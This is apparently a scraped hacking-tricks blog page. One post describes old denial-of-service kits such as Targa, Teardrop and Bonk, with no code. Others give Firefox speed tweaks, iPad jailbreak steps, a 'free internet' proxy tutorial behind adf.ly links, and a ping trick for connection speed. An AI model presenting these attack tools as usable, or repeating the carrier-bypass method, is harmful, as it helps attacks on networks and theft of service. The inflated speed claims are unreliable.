Bubonic.c is a denial of service program written against Windows 2000 machines and certain versions of Linux. It has been noted to work against certain versions of Linux. The denial of service works by randomly sending TCP packets with random settings, etc. This in turn brings the load up causing the box to crash with error code: STOP 0×00000041 (0×00001000, 0×00001279, 0x000042A, 0×00000001) MUST_SUCCEED_POOL_EMPTY

Hacking Tool: Targa

Targa is a program that can be used to run 8 different Denial Of Service attacks.
The attacker has the option to either launch individual attacks or to try all the attacks until it is successful.
Targa is a very powerful program and can do a lot of damage to a company’s network.

Targa, written by a German hacker known as Mixter, combines several tools specifically devised to attack machines that run Microsoft Windows. The potency of these tools can be increased further by using them to attack a target machine from several compromised computers at once. However, this requires the attacker to log on to each computer in turn to initiate the attack.

Targa is a free software packet available in the Internet. Targa contains many of the most well known protocol or Operating System based DoS attacks. The attacker must be logged in with root permissions; since most of the attacks, use IP spoofing that requires root privileges. The attack can be done from any machine on which the targa.c code compiles. Mainly, the Targa packet is intended to be used in Linux or BSD Unix computers. Target platforms can be any possible Operating System. However, the attacks do not have an impact on all Operating Systems.
The attacks that can be done with the Targa kit:

Jolt by Jeff W. Roberson (modified by Mixter for overdrop effect) – discussed separately
Land by m3lt – discussed separately
Winnuke by _eci – discussed separately
Nestea by humble and ttol – Nestea exploits the “off by one IP header” bug in the Linux IP packet fragmentation code. Nestea crashes Linux 2.0.33 and earlier and some Windows versions. A new and improved version of the Nestea Linux IP fragmentation is available
Syndrop by PineKoan – Syndrop is a mixture of teardrop and a TCP SYN flooding attack. Affected platforms are Linux and Windows 95/NT.
Teardrop by route|daemon9 – This type of denial of service attack exploits the way that the Internet Protocol (IP) requires a packet that is too large for the next router to handle be divided into fragments. The fragment packet identifies an offset to the beginning of the first packet that enables the entire packet to be reassembled by the receiving system. In the teardrop attack, the attacker’s IP puts a confusing offset value in the second or later fragment. If the receiving operating system does not have a plan for this situation, it can cause the system to crash.

This bug has not been shown to cause any significant damage to systems, and a simple reboot is the preferred remedy. However, though non-destructive, this bug could cause possible problems if you have unsaved data in an open application when you are attacked, causing you to lose the data. There are fixes against Teardrop.

Bonk by route |daemon9 & klepto – Bonk is based on teardrop.c. Bonk crashes Windows 95 and NT operating systems. Boink is an improved version of bonk.c. Boink allows UDP port ranges and can possibly crash a patched Windows 95/NT machine. NewTear is another variant of teardrop.c, which is slightly different from bonk.c. Mainly they do the same thing just in different ways. Small changes in the code may have significant changes in the results, as you can see below.

NewTear by route | daemon9 – NewTear is another variant of teardrop.c

Comments : 1

Posted :

Tag : Tricks And Tutorials,

12 Tricks to Increase Firefox speed 10 times

11 tricks to increase Firefox browsing and normal speed 10 to 30 times. These are 100% tested hacks and improves the browsing speed of Firefox at least 10 times. These tricks are basically the latest tweaks found by several computer experts including me. These are doonstuntsmania special tricks that boost your Mozilla Firefox browsing speed by 10-30 times.

howt to speed up firefox, increase browsing speed, firefox tips and tricks

11 Tricks to Increase Firefox Speed

1. Type about:config in the address bar and then press Enter.

2. In the filter search bar type network.http.pipelining. Be sure the value field is set true,if not double-click to set true. HTTP is the application-layer protocol that most web pages are transferred with. In HTTP 1.1, multiple requests can be sent before any responses are received. This is known as pipelining. Pipelining reduces page loading times, but not all servers support it.

3. Go back to the filter search bar and type network.http.pipelining.maxrequests. Double-click this option and set its value to 8.

4. In the filter search bar and type network.http.proxy.pipelining. Once opened doubleclick on it and set it to true.

5. In IPv6-capable DNS servers, an IPv4 address may be returned when an IPv6 address is requested. It is possible for Mozilla to recover from this misinformation, but a significant delay is introduced.

Type network.dns.disableIPv6 in the filter search bar and set this option to true by double clicking on it.

6. CONTENT INTERRUPT PARSING

This preference controls if the application will interrupt parsing a page to respond to UI events. It does not exist by default. Right-click (Apple users ctrl-click) anywhere in the about:config window, select New and then Boolean from the pop-up menu. Then:

A. Enter content.interrupt.parsing in the New boolean value pop-up window and click OK

B. When prompted to choose the value for the new boolean, select true and click OK.

7. Rather than wait until a page has completely downloaded to display it to the user, Mozilla applications will regularly render what has been received to that point. This option controls the maximum amount of time the application will be unresponsive while rendering pages. Right-click (Apple users ctrl-click) anywhere in the about:config window, select New and then Integer from the pop-up menu.

A. Enter content.max.tokenizing.time in the New integer value pop-up window and click OK

B. You will be prompted to enter a value. Enter 2250000 and click OK.

8. CONTENT NOTIFY INTERVAL

This option sets the minimum amount of time to wait between re flows. Right-click (Apple users ctrl-click) anywhere in the about:config window, select New and then Integer from the pop-up menu.

A. Type content.notify.interval in the New integer value pop-up window and click OK.

B. You will be prompted to enter a value. Enter 750000 and click OK.

9. CONTENT NOTIFY ON TIMER

A. This option sets if to re-flow pages at an interval any higher than that specified by content.notify.interval. Right-click (Apple users ctrl-click) anywhere in the about:config window and select New and then Boolean from the pop-up menu.

B. Type content.notify.ontimer in the New boolean value pop-up window and click OK.

C. You will be prompted to choose the value for the new boolean. Select true and click OK.

10. Notify Backoffcount

This option controls the maximum number of times the content will do timer-based reflows. After this number has been reached, the page will only reflow once it is finished downloading. Right-click (Apple users ctrl-click) anywhere in the about:config window and select New and then Integer from the pop-up menu.

A. Enter content.notify.backoffcount in the New integer value pop-up window and click OK.

B. You will be prompted to enter a value. Enter 5 and click OK.

11. CONTENT SWITCH THRESHOLD

You can interact with a loading page when content.interrupt.parsing is set to true. When a page is loading, the application has two modes: a high frequency interrupt mode and a low frequency interrupt mode. The first one interrupts the parser more frequently to allow for greater UI responsiveness during page load.

The low frequency interrupt mode interrupts the parser less frequently to allow for quicker page load. The application enters high frequency interrupt mode when you move the mouse or type on the keyboard and switch back to low frequency mode when you had no activity for a certain amount of time. This preference controls that amount of time. Right-click (Apple users ctrl-click) anywhere in the about:config window and select New and then Integer from the pop-up menu.

A. Enter content.switch.threshold in the New integer value pop-up window and click OK.

B. You will be prompted to enter a value. Enter 750000 and click OK.

12. NGLAYOUT INITIALPAINT DELAY

Mozilla applications render web pages incrementally, they display what’s been received

of a page before the entire page has been downloaded. Since the start of a web page

normally doesn’t have much useful information to display, Mozilla applications will wait

a short interval before first rendering a page. This preference controls that interval. Rightclick (Apple users ctrl-click) anywhere in the about:config window and select New and then Integer from the pop-up menu.

A. Enter nglayout.initialpaint.delay in the New integer value pop-up window and click OK.

B. You will be prompted to enter a value. Enter 0 and click OK.

Comments : 1

Posted :

Tag : Tricks And Tutorials,

Jailbreak Your IPad

How To Jailbreak The iPad Using JailbreakMe

These are instructions on how to jailbreak The iPad
Step One
Press to launch Safari from your Springboard.

Step Two
Press to select the address bar and input http://jailbreakme.com then press the Done button.

Step Three
To begin the jailbreak simply move the slider to right.

Step Four
You will be displayed a status bar as the download progresses.

Step Five
Once the download is complete the jailbreak process will begin

Step Six
Once you are notified that the jailbreak process is complete press the OK button.

Press the Home button to reveal Cydia on your desktop!

Congratulations you are done!

Comments : 0

Posted :

Tag : Mobile Tricks,

Download Auto Hide IP V.5.1.7.2 Full

Auto Hide IP - Hide Your IP Address, Surf Anonymously, Protect Your Identity, Guard Against Hackers.
Be careful! Have you ever been aware of your IP address? Your IP exactly points to your location, with very high precision, right to the door of your apartment. Every time you visit a website, your IP address is completely exposed.

Auto Hide IP will help you conceal your real IP and protect your identity online. You need not worry about your privacy and security any more. Browse anonymously with one click from now on.

Download

Comments : 0

Posted :

Way To Increase internet speed in 2G/3G And Others

This trick works on Dial-up's, Dsl, Broadband and wireless modems as well as

Click on start button
then select Run which opens run dialog box...(in windows 7 press windows key+R)
*write "Cmd" and press enter

it will opens command prompt (A Black Screen)

[If you are using windows7 don't use windows powershell]

*In that Cmd Prompt (Black Screen) write "ipconfig/all"

Scroll up and inside the PPP adapter
find the IP address of DNS Servers (first one if there exist more then one e.g. 121.242.190.210)

then click on start button and select run (in windows 7 press windows key+R)
*then write the following command in it
"ping < "DNS SERVER IP" > -t"

e.g. ping 121.242.190.210 -t

This command opens command prompt which is pinging your server minimize and don't close it...
you can close the previous command prompt in which you find out your DNS Server IP
This command forces your server to stay connected with you....

Comments : 1

Posted :

Tag : Mobile Tricks,

[FREE]-Get Free Internet in 2G 3G And Others[FREE]

[FREE]-Get Free Internet in 2G 3G And Others[FREE]

Here Is My New Tutorial How To get Free Internet for 2x 3x And Others

Use PD-Proxy - VPN Tunneling Software

This is fully tested on Tatadocomo and airtel And Iam Using n70 With tata docomo internet

Go here And Make Your Account 1st http://adf.ly/1l0up

Step

1. Install .NET Framework 3.5 - http://adf.ly/1l0KS

2. Download and unzip the binary at http://adf.ly/1l0cM

3. A messagebox will appear asking you if your system is running on a 32bit or a 64bit platform.

4. Open PD-Proxy.exe When a asks you to install a driver press Yes.

5. Connect Your Internet Pc suit ya Manual Connection

6. Press connect In pd proxy Software and wait till it says that you are connected.

Hey You Successfully Connected!

Here Is My Screen Shot After Connecting

My Ip Showing I am From Netherlands

Note:-You Are Not A Premium User In http://www.pdproxy.com

You are A Demo User So U can't Get Unlimited Access

Premium User Only Get a Unlimited Access

For Demo User >>>>100Mb Per Day

Premium User >>>>> Unlimited

for More Info ---- go to http://adf.ly/1l0vk

Thanks regard Yogesh Kashyap

Comments : 0

Posted :

Tag : Mobile Tricks,

Labels

Popular Posts

Blogroll

Recent Comments

BlogRoll

Recent Posts

Archive for June 2011

Unix Network Programming

RedHat System Administrator

Network Security Hacks

Linux - Complete Command Reference

Home Wireless Networking In A Snap

Hardcode Windows XP

Hacking Windows XP

Hacking The Art of Exploitation 2

Hacking Gmail

Dictionary Of Networking

Batch File Programming

Hacking for Dummies

The Hacker's Underground HandBook

[TuT] RFI - Remote File Inclusion.

SSI (Server Side Inclusion)

LFI (Local File Inclusion) TuTorial Proc Self Environ

Dos Attack And Hacking Toolst

12 Tricks to Increase Firefox speed 10 times

Jailbreak Your IPad

How To Jailbreak The iPad Using JailbreakMe

Download Auto Hide IP V.5.1.7.2 Full

Way To Increase internet speed in 2G/3G And Others

[FREE]-Get Free Internet in 2G 3G And Others[FREE]

About Hacking Cracking Tricks

Recent Post